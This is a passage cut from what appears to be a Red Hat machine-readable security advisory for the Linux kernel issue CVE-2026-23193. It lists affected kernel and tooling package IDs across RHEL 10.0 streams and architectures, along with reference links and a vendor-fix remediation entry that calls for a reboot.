"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23193"
},
{
"category": "external",
"summary": "RHBZ#2439887",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439887"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23193",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23193"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23193",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23193"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2026021434-CVE-2026-23193-2c6c@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2026021434-CVE-2026-23193-2c6c@gregkh/T"
}
],
"release_date": "2026-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T18:30:02+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
